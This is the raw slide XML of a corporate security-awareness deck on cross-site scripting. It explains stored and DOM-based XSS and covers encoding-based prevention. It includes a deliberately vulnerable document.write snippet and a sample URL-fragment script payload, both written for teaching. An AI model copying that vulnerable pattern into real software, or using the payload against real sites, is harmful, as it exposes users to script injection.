                <a:t>Code execution!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9167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722D816-E28D-5D4E-A6F2-70452C27BCBB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7D90E-86B8-8447-BD12-64763838B6A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334964" y="5641131"/>
            <a:ext cx="4847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Stored XSS - How does it work?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Graphic 7" descr="Server">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33411009-0208-4A4C-A991-F1319487A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16180" y="1167595"/>
            <a:ext cx="1689652" cy="1689652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Graphic 8" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{088FCB50-D463-8042-BA37-A2DD39F7C6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0808" y="1167595"/>
            <a:ext cx="1689652" cy="1689652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24932B-AD55-8F42-9F2B-45C34611E3CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2220460" y="1773882"/>
            <a:ext cx="259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081EBA-C1CB-9E4A-BF3B-096275119F75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820834" y="1619993"/>
            <a:ext cx="11095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GB" sz="1400" dirty="0"/>
              <a:t>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6AF00A-570C-814B-97E2-9BF78001BD29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924178" y="1927770"/>
            <a:ext cx="902910" cy="2015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0801A-9A77-1D4A-9A51-F709920007CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3201566" y="1403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endParaRPr kumimoji="1"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F9D3A3-0E65-5341-A35A-58905088C519}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2220460" y="1927770"/>
            <a:ext cx="2595720" cy="1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42FA5C-C2B4-0D42-A400-92A753B75500}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3201566" y="19277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dirty="0"/>
              <a:t>data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EC3A5D-A7EF-D24E-BB36-0B3D9AAADDB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6370429" y="1772666"/>
            <a:ext cx="25957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atabase">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31107E18-0797-6445-BBAA-823B45FC30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30746" y="1167595"/>
            <a:ext cx="1689652" cy="1689652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65F93E-259C-E743-A090-3D6BFB177E29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6370429" y="1908843"/>
            <a:ext cx="2595720" cy="18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0B56B0-F2B6-044A-B06D-023626DB2567}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10202555" y="1473812"/>
            <a:ext cx="18253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sz="1600" dirty="0"/>
              <a:t>Data is stored, so it can be used elsewhere in the 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8CE3DC-8943-1349-8BFF-AA9FE121DD93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7351535" y="140333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</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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221918-FDFB-A140-82C6-23D426C45BBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7351535" y="192777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dirty="0"/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16F98F-D44B-8645-AA47-2228C8F4C653}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2433170" y="4192977"/>
            <a:ext cx="645567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GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why is stored XSS so powerful?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Let’s take another look at Bob’s online store…</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-GB" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Graphic 38" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E377D323-CF15-D443-96A6-167450DFF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3498" y="3309645"/>
            <a:ext cx="661290" cy="661290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Graphic 37" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C19AD5AD-B0C8-0249-AEDA-3016DFDB17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9550" y="3309645"/>
            <a:ext cx="661290" cy="661290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="Graphic 39" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37118211-188B-A54B-BBCF-DD659B3180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69202" y="3309645"/>
            <a:ext cx="661290" cy="661290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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92C47D21-3BE1-CE49-B437-93D562F78E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33846" y="3309645"/>
            <a:ext cx="661290" cy="661290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Graphic 40" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59C31DE6-935D-9F48-8D59-A7B9EE1968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4906" y="3309645"/>
            <a:ext cx="661290" cy="661290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="Graphic 34" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BA1EFF6-9E8B-9042-B3CE-D02DE176B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20216" y="3309645"/>
            <a:ext cx="661290" cy="661290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Graphic 41" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F616BABA-2499-C34B-9C6F-85E140C5C4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60610" y="3309645"/>
            <a:ext cx="661290" cy="661290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Graphic 33" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBC70EF8-FB37-A646-AB66-3C888AFF1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74512" y="3309645"/>
            <a:ext cx="661290" cy="661290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="Graphic 42" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{192FBA76-EA02-A64A-AD0B-95FF9EB00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04558" y="3309645"/>
            <a:ext cx="661290" cy="661290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Graphic 43" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C0EE220-FB06-074D-B016-EAA78E3B6B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262" y="3309645"/>
            <a:ext cx="661290" cy="661290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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32593346-DE9B-A848-A1CE-CC4458622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0564" y="3309645"/>
            <a:ext cx="661290" cy="661290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Graphic 44" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B642513-B50C-FD49-87A5-6473504785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93244" y="3309645"/>
            <a:ext cx="661290" cy="661290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Graphic 31" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34579C35-AFFA-7943-A94A-A9022ED10D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860" y="3309645"/>
            <a:ext cx="661290" cy="661290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2C54D1-9A00-2143-970D-F540C47EC713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594665" y="3130062"/>
            <a:ext cx="10126513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85C932-F075-9A4F-91D6-5C5154BC0327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="594665" y="3116214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2247BE3-51DD-484C-8376-3FB8B29071EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1466843" y="3130062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D6010F-9FE1-8D48-ABB9-9BCA1A32A006}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2312547" y="3135974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1415EB-C578-E940-A9E0-74BBBF8198A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5660768" y="2703810"/>
            <a:ext cx="1" cy="75879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33B6A60-D17B-4945-856D-526975B4E88C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4829694" y="3143911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B236457-C1D9-F948-856C-7DE23C8C9D47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6503686" y="3163671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BE473B0-5C27-3546-B388-B0E0A41881A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3957516" y="3130063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9D3766F-DAA2-3144-A732-A3D10F070C09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7346604" y="3138045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FF4BD76-EA80-7740-BD7E-9C06EE3418EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3162780" y="3149822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234C24-FA7E-3948-BB3F-204EFF17E956}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8218782" y="3151893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98D1094-F328-2848-BC88-9529DEB4494E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9064486" y="3157805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2CA50D1-36EE-314E-9366-9053228B50CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9914719" y="3171653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CB2760-49C6-8B44-BF5F-02241606E9FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10709455" y="3151894"/>
            <a:ext cx="11723" cy="3127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974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0C175-8E1B-1341-925F-2BA202DF0246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B09A4-727E-664F-882F-5147D7A45187}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334964" y="5641131"/>
            <a:ext cx="5618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DOM-Based XSS - How does it work?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EEBABA-1705-B845-AAEF-9859781340AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334965" y="1411497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The DOM (Document Object Model) is used by browsers to represent HTML/XML documents in a tree structure (the DOM tree). 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9F8B8B0A-80CF-D844-A21C-5A44960B03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588249"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8391630" y="2046022"/>
          <a:ext cx="3541609" cy="3975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CBF78A4-9946-B849-A405-9FA58C43FF31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334964" y="2183614"/>
            <a:ext cx="8056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DOM-based attacks are client-side, and occur when a web application uses data from an untrusted source without proper sanitisation.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CE0881-9EBE-7A45-8377-FF620348E1E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334964" y="3087402"/>
            <a:ext cx="7010216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&lt;script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("You are here:&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nbsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.baseURI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&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-GB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8AE26D-7A47-6541-9BFC-AD6F26683FFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334963" y="4268189"/>
            <a:ext cx="70102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www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>test.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;script&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-GB" b="1" dirty="0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F11344-A090-C742-9132-87AE4FC07FA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="4149891"/>
            <a:ext cx="2903698" cy="626789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E7306-02A0-B044-9178-ED1C155999DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334964" y="4772705"/>
            <a:ext cx="887054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en-GB" dirty="0"/>
              <a:t>Anything written after the # in a URL is never sent to the server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-GB" dirty="0"/>
              <a:t>herefore, cannot be sanitised.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79630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0C175-8E1B-1341-925F-2BA202DF0246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B09A4-727E-664F-882F-5147D7A45187}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334964" y="5641131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How do we prevent XSS?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0F7F8-996C-174B-ADC1-F9B17CD2D456}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334964" y="1411498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XSS Prevention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4FCDE-4718-CB49-9B39-A6FEA39261E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334964" y="1906616"/>
            <a:ext cx="11522074" cy="225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dirty="0"/>
              <a:t>The most common way to prevent XSS is via HTML Entity Encoding.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GB" sz="1600" dirty="0"/>
              <a:t>This means that characters such as “&lt;“ will be read as a character entity, rather than as code.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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Be aware though, this encoding does not protect you if data is placed inside a &lt;script&gt; tag. It should only be used for the &lt;body&gt; of an HTML document.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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To prevent DOM-Based XSS, we need to HTML escape, and then JavaScript escape.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423BF-05CC-1447-9AAA-263D743250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25"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3347197" y="4863443"/>
            <a:ext cx="8509841" cy="43460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8D5929-95E2-7B49-9730-945238DE36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1043"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="334964" y="4303055"/>
            <a:ext cx="4444302" cy="434601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Graphic 17" descr="Back">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D79F8A22-292B-E346-9B88-9365294C47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557115" y="4739214"/>
            <a:ext cx="713238" cy="7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523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5422BDF-E941-7344-AE92-22D146E8DA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8" r="425" b="41961"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="334964" y="1906615"/>
            <a:ext cx="10362596" cy="39653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altLang="ja-JP" dirty="0"/>
              <a:t>XSS - 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F44635-86FF-904F-82C5-95A0A55B9725}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="863667"/>
            <a:ext cx="422722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1F0C175-8E1B-1341-925F-2BA202DF0246}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5515345"/>
            <a:ext cx="12192000" cy="7132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B09A4-727E-664F-882F-5147D7A45187}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334964" y="5641131"/>
            <a:ext cx="3874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GB" sz="2400" b="1" dirty="0"/>
              <a:t>How do we prevent XSS?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0F7F8-996C-174B-ADC1-F9B17CD2D456}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334964" y="1411498"/>
            <a:ext cx="8105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XSS Prevention - OWASP XSS Prevention &amp; DOM-based XSS Prevention</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="721440029"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="R-Style v3.0">
  <a:themeElements>
    <a:clrScheme name="R-Style v2.0">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="BF0000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F0F0F0"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="BF0000"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="EC4848"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FFBA46"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="7FDB4B"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="37B4F3"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="2D5BD6"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="0000FF"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="800080"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="ユーザー定義 1">
      <a:majorFont>
        <a:latin typeface="Rakuten Global B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kumimoji="1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3" id="{03BB6033-5000-4161-A267-D5C2B91B0EA1}" vid="{64B5F1D1-64FD-4D34-A892-385633CA1EA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R-Style v3</Template>
  <TotalTime>58438</TotalTime>
  <Words>766</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen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Rakuten Global B</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>R-Style v3.0</vt:lpstr>
      <vt:lpstr>Web Threats - XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>XSS - Introduction</vt:lpstr>
      <vt:lpstr>XSS - Introduction</vt:lpstr>
      <vt:lpstr>XSS - Introduction</vt:lpstr>
      <vt:lpstr>XSS - Introduction</vt:lpstr>
      <vt:lpstr>XSS - Introduction</vt:lpstr>
      <vt:lpstr>XSS - Introduction</vt:lpstr>
      <vt:lpstr>XSS - Introduction</vt:lpstr>
      <vt:lpstr>XSS - Introduction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Security Awareness and Compliance Training</dc:title>
  <dc:creator>Olsen, Alexander</dc:creator>
  <cp:lastModifiedBy>Olsen, Alexander</cp:lastModifiedBy>
  <cp:revision>1358</cp:revision>
  <cp:lastPrinted>2019-02-13T00:27:04Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-01-16T06:24:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-16T22:32:56Z</dcterms:modified>
</cp:coreProperties>
</file>